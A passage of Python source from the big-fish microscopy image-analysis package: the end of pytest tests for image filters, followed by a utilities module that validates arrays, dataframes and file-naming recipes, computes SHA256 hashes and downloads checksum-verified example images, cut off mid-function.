[1.556, 1., 0.444, 0., 0.],
[0.889, 0.778, 1.111, 0.667, 0.556],
[0.333, 0.444, 1., 0.667, 0.556],
[0.222, 0.333, 0.889, 0.667, 0.556]],
dtype=np.float32)
assert_allclose(filtered_x, expected_x, rtol=1e-02)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.mean_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_allclose(filtered_x, expected_x, rtol=1e-02)
assert filtered_x.dtype == np.float64
def test_median_filter():
# np.uint8
filtered_x = stack.median_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2, 2, 0, 0, 0],
[2, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.median_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_maximum_filter():
# np.uint8
filtered_x = stack.maximum_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[3, 3, 2, 0, 0],
[3, 3, 2, 0, 0],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.maximum_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_minimum_filter():
# np.uint8
filtered_x = stack.minimum_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.minimum_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_log_filter():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.log_filter(y_float64, 2)
expected_y_float64 = np.array(
[[0., 0., 0.02995949, 0.06212277, 0.07584532],
[0., 0., 0.02581818, 0.05134284, 0.06123539],
[0., 0., 0.01196859, 0.0253716, 0.02853162],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.log_filter(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
filtered_y = stack.log_filter(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
filtered_y = stack.log_filter(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_gaussian_filter():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.gaussian_filter(y_float64, 2)
expected_y_float64 = np.array(
[[0.08928096, 0.1573019 , 0.22897881, 0.28086597, 0.3001061 ],
[0.08668051, 0.14896399, 0.21282558, 0.25752308, 0.27253406],
[0.07634613, 0.12664142, 0.17574502, 0.20765944, 0.2155001 ],
[0.05890843, 0.09356377, 0.12493327, 0.1427122 , 0.14374558],
[0.03878372, 0.05873308, 0.07492625, 0.08201409, 0.07939603]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.gaussian_filter(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
with pytest.raises(ValueError):
stack.gaussian_filter(y, 2, allow_negative=True)
filtered_y = stack.gaussian_filter(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
with pytest.raises(ValueError):
stack.gaussian_filter(y_uint16, 2, allow_negative=True)
filtered_y = stack.gaussian_filter(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_background_removal_mean():
# np.uint8
filtered_x = stack.remove_background_mean(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 1, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 2, 0, 5, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.remove_background_mean(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_background_removal_gaussian():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.remove_background_gaussian(y_float64, 2)
expected_y_float64 = np.array(
[[0., 0., 0.01415845, 0.36227129, 0.],
[0., 0., 0.25776265, 0.66404555, 0.43726986],
[0., 0., 0.11052949, 0.59626213, 0.],
[0., 0.42016172, 0., 0., 0.],
[0., 0., 0., 0., 0.]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.remove_background_gaussian(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
with pytest.raises(ValueError):
stack.gaussian_filter(y, 2, allow_negative=True)
filtered_y = stack.remove_background_gaussian(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
with pytest.raises(ValueError):
stack.gaussian_filter(y_uint16, 2, allow_negative=True)
filtered_y = stack.remove_background_gaussian(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_dilation_filter():
# np.uint8
filtered_x = stack.dilation_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[3, 3, 2, 0, 0],
[3, 3, 2, 0, 0],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.dilation_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.dilation_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float32)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.dilation_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float64
# bool
filtered_x = stack.dilation_filter(x.astype(bool),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(bool)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == bool
def test_erosion_filter():
# np.uint8
filtered_x = stack.erosion_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.erosion_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.erosion_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float32)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.erosion_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float64
# bool
filtered_x = stack.erosion_filter(x.astype(bool),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(bool)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == bool
```
#### File: bigfish/stack/utils.py
```python
import os
import re
import copy
import inspect
import hashlib
import numpy as np
import pandas as pd
from urllib.request import urlretrieve
# ### Sanity checks dataframe ###
def check_df(df, features=None, features_without_nan=None):
"""Full safety check of a dataframe.
Parameters
----------
df : pd.DataFrame or pd.Series
Dataframe or Series to check.
features : List[str]
Names of the expected features.
features_without_nan : List[str]
        Names of the features to check for missing values.
Returns
-------
_ : bool
Assert if the dataframe is well formatted.
"""
# check parameters
check_parameter(df=(pd.DataFrame, pd.Series),
features=(list, type(None)),
features_without_nan=(list, type(None)))
# check features
if features is not None:
_check_features_df(df, features)
# check NaN values
if features_without_nan is not None:
_check_features_df(df, features_without_nan)
_check_nan_df(df, features_without_nan)
return True
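# Illustrative usage (not part of the original module; the dataframe below is
# hypothetical):
#
#   df = pd.DataFrame({"x": [1, 2], "y": [3, 4]})
#   check_df(df, features=["x", "y"], features_without_nan=["x", "y"])
#
# returns True, or raises a ValueError if a column is missing or contains NaN.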
def _check_features_df(df, features):
"""Check that the dataframe contains expected features.
Parameters
----------
df : pd.DataFrame
Dataframe to check.
features : List[str]
Names of the expected features.
"""
# check columns
if not set(features).issubset(df.columns):
raise ValueError("The dataframe does not seem to have the right "
"features. {0} instead of {1}"
.format(list(df.columns.values), features))
def _check_nan_df(df, features_to_check=None):
"""Check specific columns of the dataframe do not have any missing values.
Parameters
----------
df : pd.DataFrame
Dataframe to check.
features_to_check : List[str]
Names of the checked features.
"""
# count NaN
nan_count = df.isnull().sum()
# for the full dataframe...
if features_to_check is None:
x = nan_count.sum()
if x > 0:
raise ValueError("The dataframe has {0} NaN values.".format(x))
# ...or for some features
else:
nan_count = nan_count[features_to_check]
x = nan_count.sum()
if x > 0:
raise ValueError("The dataframe has {0} NaN values for the "
"requested features: \n{1}.".format(x, nan_count))
# ### Sanity checks array ###
def check_array(array, ndim=None, dtype=None, allow_nan=True):
"""Full safety check of an array.
Parameters
----------
array : np.ndarray
Array to check.
ndim : int or List[int]
Number of dimensions expected.
dtype : type or List[type]
Types expected.
allow_nan : bool
Allow NaN values or not.
Returns
-------
_ : bool
Assert if the array is well formatted.
"""
# check parameters
check_parameter(array=np.ndarray,
ndim=(int, list, type(None)),
dtype=(type, list, type(None)),
allow_nan=bool)
# check the dtype
if dtype is not None:
_check_dtype_array(array, dtype)
# check the number of dimension
if ndim is not None:
_check_dim_array(array, ndim)
# check NaN
if not allow_nan:
_check_nan_array(array)
return True
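# Illustrative usage (not part of the original module; the image below is
# hypothetical): validating a 2-d float image before processing.
#
#   image = np.zeros((64, 64), dtype=np.float32)
#   check_array(image, ndim=2, dtype=[np.float32, np.float64], allow_nan=False)
#
# returns True, or raises TypeError/ValueError if one of the checks fails.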
def _check_dtype_array(array, dtype):
"""Check that a np.ndarray has the right dtype.
Parameters
----------
array : np.ndarray
Array to check
dtype : type or List[type]
Type expected.
"""
# enlist the dtype expected
if isinstance(dtype, type):
dtype = [dtype]
# TODO simplify
# check the dtype of the array
error = True
for dtype_expected in dtype:
if array.dtype == dtype_expected:
error = False
break
if error:
raise TypeError("{0} is not supported yet. Use one of those dtypes "
"instead: {1}.".format(array.dtype, dtype))
def _check_dim_array(array, ndim):
"""Check that the array has the right number of dimensions.
Parameters
----------
array : np.ndarray
Array to check.
ndim : int or List[int]
Number of dimensions expected
"""
# enlist the number of expected dimensions
if isinstance(ndim, int):
ndim = [ndim]
# check the number of dimensions of the array
if array.ndim not in ndim:
raise ValueError("Array can't have {0} dimension(s). Expected "
"dimensions are: {1}.".format(array.ndim, ndim))
def _check_nan_array(array):
"""Check that the array does not have missing values.
Parameters
----------
array : np.ndarray
Array to check.
"""
# count nan
mask = np.isnan(array)
x = mask.sum()
# check the NaN values of the array
if x > 0:
raise ValueError("Array has {0} NaN values.".format(x))
def check_range_value(array, min_=None, max_=None):
"""Check the support of the array.
Parameters
----------
array : np.ndarray
Array to check.
min_ : int
Minimum value allowed.
max_ : int
Maximum value allowed.
Returns
-------
_ : bool
Assert if the array has the right range of values.
"""
# check lowest and highest bounds
if min_ is not None and array.min() < min_:
raise ValueError("The array should have a lower bound of {0}, but its "
"minimum value is {1}.".format(min_, array.min()))
if max_ is not None and array.max() > max_:
raise ValueError("The array should have an upper bound of {0}, but "
"its maximum value is {1}.".format(max_, array.max()))
return True
# ### Recipe management (sanity checks, fitting) ###
def check_recipe(recipe, data_directory=None):
"""Check and validate a recipe.
Checking a recipe consists in validating its filename pattern and the
content of the dictionary.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
data_directory : str
        Path of the directory with the files described in the recipe. If it is
        provided, the function checks that the files exist.
Returns
-------
_ : bool
Assert if the recipe is well formatted.
"""
# check parameters
check_parameter(recipe=dict,
data_directory=(str, type(None)))
# check the filename pattern
if "pattern" not in recipe:
raise KeyError("A recipe should have a filename pattern "
"('pattern' keyword).")
recipe_pattern = recipe["pattern"]
if not isinstance(recipe_pattern, str):
raise TypeError("'pattern' should be a string, not a {0}."
.format(type(recipe_pattern)))
    # count the different dimensions to combine in the recipe (among
# 'fov', 'r', 'c' and 'z')
dimensions = re.findall("fov|r|c|z", recipe_pattern)
# each dimension can only appear once in the filename pattern
if len(dimensions) != len(set(dimensions)):
raise ValueError("The pattern used in recipe is wrong, a dimension "
"appears several times: {0}".format(recipe_pattern))
# check keys and values of the recipe
for key, value in recipe.items():
if key not in ['fov', 'r', 'c', 'z', 'ext', 'opt', 'pattern']:
raise KeyError("The recipe can only contain the keys 'fov', 'r', "
"'c', 'z', 'ext', 'opt' or 'pattern'. Not '{0}'."
.format(key))
if not isinstance(value, (list, str)):
raise TypeError("A recipe can only contain lists or strings, "
"not {0}.".format(type(value)))
# check that requested files exist
if data_directory is not None:
if not os.path.isdir(data_directory):
raise NotADirectoryError("Directory does not exist: {0}"
.format(data_directory))
recipe = fit_recipe(recipe)
nb_r, nb_c, nb_z = get_nb_element_per_dimension(recipe)
nb_fov = count_nb_fov(recipe)
for fov in range(nb_fov):
for r in range(nb_r):
for c in range(nb_c):
for z in range(nb_z):
path = get_path_from_recipe(recipe, data_directory,
fov=fov, r=r, c=c, z=z)
if not os.path.isfile(path):
raise FileNotFoundError("File does not exist: {0}"
.format(path))
return True
def fit_recipe(recipe):
"""Fit a recipe.
    Fitting a recipe consists in wrapping every value of `fov`, `r`, `c` and
    `z` in a list (initialized with [None] if the key is missing). Values for
    `ext` and `opt` are also initialized (with an empty string if missing).
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
new_recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` and `opt`, initialized if
necessary.
"""
# check parameters
check_parameter(recipe=dict)
# initialize recipe
new_recipe = copy.deepcopy(recipe)
# initialize and fit the dimensions 'fov', 'r', 'c' and 'z'
for key in ['fov', 'r', 'c', 'z']:
if key not in new_recipe:
new_recipe[key] = [None]
value = new_recipe[key]
if isinstance(value, str):
new_recipe[key] = [value]
# initialize the dimensions 'ext', 'opt'
for key in ['ext', 'opt']:
if key not in new_recipe:
new_recipe[key] = ""
return new_recipe
def _is_recipe_fitted(recipe):
"""Check if a recipe is ready to be used.
    Fitting a recipe consists in wrapping every value of `fov`, `r`, `c` and
    `z` in a list (initialized with [None] if the key is missing). Values for
    `ext` and `opt` are also initialized (with an empty string if missing).
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
_ : bool
Indicates if the recipe is fitted or not
"""
# all keys should be initialized in the new recipe, with a list or a string
for key in ['fov', 'r', 'c', 'z']:
if key not in recipe or not isinstance(recipe[key], list):
return False
for key in ['ext', 'opt']:
if key not in recipe or not isinstance(recipe[key], str):
return False
if 'pattern' not in recipe or not isinstance(recipe['pattern'], str):
return False
return True
def get_path_from_recipe(recipe, input_folder, fov=0, r=0, c=0, z=0):
"""Build the path of a file from a recipe and the indices of specific
elements.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
input_folder : str
Path of the folder containing the images.
fov : int
Index of the `fov` element in the recipe to use in the filename.
r : int
Index of the `r` element in the recipe to use in the filename.
c : int
Index of the `c` element in the recipe to use in the filename.
z : int
Index of the `z` element in the recipe to use in the filename.
Returns
-------
path : str
Path of the file to load.
"""
# check parameters
check_parameter(recipe=dict,
input_folder=str,
fov=int,
r=int,
c=int,
z=int)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
# build a map of the elements' indices
map_element_index = {"fov": fov, "r": r, "c": c, "z": z}
# get filename pattern and decompose it
recipe_pattern = recipe["pattern"]
path_elements = re.findall("fov|r|c|z|ext|opt", recipe_pattern)
path_separators = re.split("fov|r|c|z|ext|opt", recipe_pattern)
# get filename recombining elements of the recipe
filename = path_separators[0] # usually an empty string
for (element_name, separator) in zip(path_elements, path_separators[1:]):
# if we need an element from a list of elements of the same dimension
# (eg. to pick a specific channel 'c' among a list of channels)
if element_name in map_element_index:
element_index = map_element_index[element_name]
element = recipe[element_name][element_index]
        # if this element is unique for the whole recipe (eg. 'ext' or 'opt')
else:
element = recipe[element_name]
        # the filename is built preserving the order of appearance of the
        # different elements and their separators
filename += element
filename += separator
# get path
path = os.path.join(input_folder, filename)
return path
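# Illustrative example (hypothetical recipe, not from the original codebase):
#
#   recipe = {"pattern": "opt_c.ext",
#             "opt": "experiment_1",
#             "c": ["dapi", "smfish"],
#             "ext": "tif"}
#   get_path_from_recipe(recipe, "/data", c=1)
#
# should return "/data/experiment_1_smfish.tif": the literal characters of the
# pattern ("_" and ".") act as separators between the recipe elements.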
def get_nb_element_per_dimension(recipe):
"""Count the number of element to stack for each dimension (`r`, `c`
and `z`).
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Only contain the keys
`fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
nb_r : int
Number of rounds to be stacked.
nb_c : int
Number of channels to be stacked.
nb_z : int
Number of z layers to be stacked.
"""
# check parameters
check_parameter(recipe=dict)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
return len(recipe["r"]), len(recipe["c"]), len(recipe["z"])
def count_nb_fov(recipe):
"""Count the number of different fields of view that can be defined from
the recipe.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
nb_fov : int
Number of different fields of view in the recipe.
"""
# check parameters
check_parameter(recipe=dict)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
# a good recipe should have a list in the 'fov' key
if not isinstance(recipe["fov"], list):
raise TypeError("'fov' should be a List or a str, not {0}"
.format(type(recipe["fov"])))
else:
return len(recipe["fov"])
def check_datamap(data_map):
"""Check and validate a data map.
Checking a data map consists in validating the recipe-folder pairs.
Parameters
----------
data_map : List[tuple]
Map between input directories and recipes.
Returns
-------
_ : bool
Assert if the data map is well formatted.
"""
check_parameter(data_map=list)
for pair in data_map:
if not isinstance(pair, (tuple, list)):
raise TypeError("A data map is a list with tuples or lists. "
"Not {0}".format(type(pair)))
if len(pair) != 2:
raise ValueError("Elements of a data map are tuples or lists that "
"map a recipe (dict) to an input directory "
"(string). Here {0} elements are given {1}"
.format(len(pair), pair))
(recipe, input_folder) = pair
if not isinstance(input_folder, str):
raise TypeError("A data map map a recipe (dict) to an input "
"directory (string). Not ({0}, {1})"
.format(type(recipe), type(input_folder)))
check_recipe(recipe, data_directory=input_folder)
return True
# ### Sanity checks parameters ###
def check_parameter(**kwargs):
"""Check dtype of the function's parameters.
Parameters
----------
kwargs : Type or Tuple[Type]
Map of each parameter with its expected dtype.
Returns
-------
_ : bool
        Assert if the parameters are well formatted.
"""
# get the frame and the parameters of the function
frame = inspect.currentframe().f_back
_, _, _, values = inspect.getargvalues(frame)
# compare each parameter with its expected dtype
for arg in kwargs:
expected_dtype = kwargs[arg]
parameter = values[arg]
if not isinstance(parameter, expected_dtype):
actual = "'{0}'".format(type(parameter).__name__)
if isinstance(expected_dtype, tuple):
target = ["'{0}'".format(x.__name__) for x in expected_dtype]
target = "(" + ", ".join(target) + ")"
else:
target = expected_dtype.__name__
raise TypeError("Parameter {0} should be a {1}. It is a {2} "
"instead.".format(arg, target, actual))
return True
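# Illustrative usage (hypothetical function): check_parameter reads the
# caller's local variables by name, so it is meant to be called at the top of
# a function with keyword arguments mapping parameter names to expected types.
#
#   def rescale(image, factor):
#       check_parameter(image=np.ndarray, factor=(int, float))
#       ...
#
# Passing factor="2" would then raise a TypeError.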
# ### Constants ###
def get_margin_value():
"""Return the margin pixel around a cell coordinate used to define its
bounding box.
Returns
-------
_ : int
Margin value (in pixels).
"""
# should be greater or equal to 2 (maybe 1 is enough)
return 5
def get_eps_float32():
"""Return the epsilon value for a 32 bit float.
Returns
-------
_ : np.float32
Epsilon value.
"""
return np.finfo(np.float32).eps
# ### Fetch data ###
def load_and_save_url(remote_url, directory, filename=None):
"""Download remote data and save them
Parameters
----------
remote_url : str
Remote url of the data to download.
directory : str
        Directory in which to save the downloaded content.
filename : str
Filename of the object to save.
Returns
-------
path : str
Path of the downloaded file.
"""
# check parameters
check_parameter(remote_url=str,
directory=str,
filename=(str, type(None)))
# get output path
if filename is None:
filename = remote_url.split("/")[-1]
path = os.path.join(directory, filename)
# download and save data
urlretrieve(remote_url, path)
return path
def check_hash(path, expected_hash):
"""Check hash value of a file.
Parameters
----------
path : str
Path of the file to check.
expected_hash : str
Expected hash value.
Returns
-------
_ : bool
True if hash values match.
"""
# check parameter
check_parameter(path=str,
expected_hash=str)
# compute hash value
hash_value = compute_hash(path)
# compare checksum
if hash_value != expected_hash:
raise IOError("File {0} has an SHA256 checksum ({1}) differing from "
"expected ({2}). File may be corrupted."
.format(path, hash_value, expected_hash))
return True
def compute_hash(path):
"""Compute sha256 hash of a file.
Parameters
----------
path : str
Path to read the file.
Returns
-------
sha256 : str
Hash value of the file.
"""
# check parameters
check_parameter(path=str)
# initialization
sha256hash = hashlib.sha256()
chunk_size = 8192
# open and read file
with open(path, "rb") as f:
while True:
buffer = f.read(chunk_size)
if not buffer:
break
sha256hash.update(buffer)
# compute hash
sha256 = sha256hash.hexdigest()
return sha256
def check_input_data(input_directory, input_segmentation=False):
"""Check input images exists and download them if necessary.
Parameters
----------
input_directory : str
Path of the image directory.
input_segmentation : bool
Check 2-d example images for segmentation.
"""
# parameters
filename_input_dapi = "experiment_1_dapi_fov_1.tif"
url_input_dapi = "https://github.com/fish-quant/big-fish-examples/releases/download/data/experiment_1_dapi_fov_1.tif"
hash_input_dapi = "3ce6dcfbece75da41326943432ada4cc9bacd06750e59dc2818bb253b6e7fdcd"
filename_input_smfish = "experiment_1_smfish_fov_1.tif"
url_input_smfish = "https://github.com/fish-quant/big-fish-examples/releases/download/data/experiment_1_smfish_fov_1.tif"
hash_input_smfish = "bc6aec1f3da4c25f3c6b579c274584ce1e88112c7f980e5437b5ad5223bc8ff6"
filename_input_nuc_full = "example_nuc_full.tif"
url_input_nuc_full = "https://github.com/fish-quant/big-fish-examples/releases/download/data/example_nuc_full.tif"
hash_input_nuc_full = "3bf70c7b5a02c60725baba3dfddff3010e0957de9ab78f0f65166248ead84ec4"
filename_input_cell_full = "example_cell_full.tif"
url_input_cell_full = "https://github.com/fish-quant/big-fish-examples/releases/download/data/example_cell_full.tif"
hash_input_cell_full = "36981955ed97e9cab8a69241140a9aac3bdcf32dc157d6957fd37edcb16b34bd"
# check if input dapi image exists
path = os.path.join(input_directory, filename_input_dapi)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_dapi)
print("{0} is already in the directory"
.format(filename_input_dapi))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_dapi))
print("downloading {0}...".format(filename_input_dapi))
load_and_save_url(url_input_dapi,
input_directory,
filename_input_dapi)
check_hash(path, hash_input_dapi)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_dapi))
load_and_save_url(url_input_dapi,
input_directory,
filename_input_dapi)
check_hash(path, hash_input_dapi)
# check if input smfish image exists
path = os.path.join(input_directory, filename_input_smfish)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_smfish)
print("{0} is already in the directory"
.format(filename_input_smfish))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_smfish))
print("downloading {0}...".format(filename_input_smfish))
load_and_save_url(url_input_smfish,
input_directory,
filename_input_smfish)
check_hash(path, hash_input_smfish)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_smfish))
load_and_save_url(url_input_smfish,
input_directory,
filename_input_smfish)
check_hash(path, hash_input_smfish)
# stop here or check segmentation examples
if input_segmentation:
# check if example nucleus exists
path = os.path.join(input_directory, filename_input_nuc_full)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_nuc_full)
print("{0} is already in the directory"
.format(filename_input_nuc_full))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_nuc_full))
print("downloading {0}...".format(filename_input_nuc_full))
load_and_save_url(url_input_nuc_full,
input_directory,
filename_input_nuc_full)
check_hash(path, hash_input_nuc_full)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_nuc_full))
load_and_save_url(url_input_nuc_full,
input_directory,
filename_input_nuc_full)
check_hash(path, hash_input_nuc_full)
# check if example cell exists
path = os.path.join(input_directory, filename_input_cell_full)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_cell_full)
print("{0} is already in the directory"
.format(filename_input_cell_full))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_cell_full))
print("downloading {0}...".format(filename_input_cell_full))
load_and_save_url(url_input_cell_full,
input_directory,
filename_input_cell_full)
check_hash(path, hash_input_cell_full)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_cell_full))
load_and_save_url(url_input_cell_full,
input_directory,
filename_input_cell_full)
check_hash(path, hash_input_cell_full)
# ### Computation ###
def moving_average(array, n):
"""Compute a trailing average.
Parameters
----------
array : np.ndarray
Array used to compute moving average.
n : int
Window width of the moving average.
Returns
-------
results : np.ndarray
Moving average values.
"""
# check parameter
check_parameter(n=int)
check_array(array, ndim=1)
# compute moving average
cumsum = [0]
results = []
for i, x in enumerate(array, 1):
cumsum.append(cumsum[i-1] + x)
if i >= n:
ma = (cumsum[i] - cumsum[i - n]) / n
results.append(ma)
results = np.array(results)
return results
def centered_moving_average(array, n):
"""Compute a centered moving average.
Parameters
----------
array : np.ndarray
Array used to compute moving average.
n : int
Window width of the moving average.
Returns
-------
results : np.ndarray
Centered moving average values.
"""
# check parameter
check_parameter(n=int)
check_array(array, ndim=1)
    # pad array to keep the same length and center the outcome
if n % 2 == 0:
r = int(n / 2)
n += 1
else:
r = int((n - 1) / 2)
array_padded = np.pad(array, pad_width=r, mode="reflect")
# compute centered moving average
results = moving_average(array_padded, n)
return results
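# Illustrative example (not part of the original module):
#
#   moving_average(np.array([1., 2., 3., 4.]), n=2)   # -> array([1.5, 2.5, 3.5])
#
# centered_moving_average pads the input by reflection so the output keeps the
# same length as the input array.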
# ### Spot utilities ###
def get_sigma(voxel_size_z=None, voxel_size_yx=100, psf_z=None, psf_yx=200):
"""Compute the standard deviation of the PSF of the spots.
Parameters
----------
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d PSF.
    voxel_size_yx : int or float
        Size of a voxel on the yx plane, in nanometer.
    psf_z : int or float or None
        Theoretical size of the PSF emitted by a spot in the z plane, in
        nanometer. If None, we consider a 2-d PSF.
    psf_yx : int or float
        Theoretical size of the PSF emitted by a spot in the yx plane, in
        nanometer.
Returns
-------
sigma : Tuple[float]
Standard deviations in pixel of the PSF, one element per dimension.
"""
# check parameters
